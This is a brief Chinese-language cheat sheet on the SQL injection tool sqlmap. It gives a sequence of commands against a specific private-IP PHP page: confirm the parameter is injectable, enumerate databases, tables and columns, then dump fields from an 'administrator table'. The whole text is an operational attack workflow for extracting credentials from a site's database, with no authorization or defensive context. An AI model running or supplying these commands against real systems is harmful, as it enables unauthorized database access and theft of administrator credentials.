sql 注入工具sqlmap的使用
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79” 测试当前连接是否为注入点
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dbs 获取数据库列表
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--current-db 获取当前网站所链接的数据库
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--tables -D“目标数据库” 获取目标数据库所有表信息
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--columns -T“管理员表”-D“目标数据库”
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dump -C“字段”-T“管理员表”-D“目标数据库”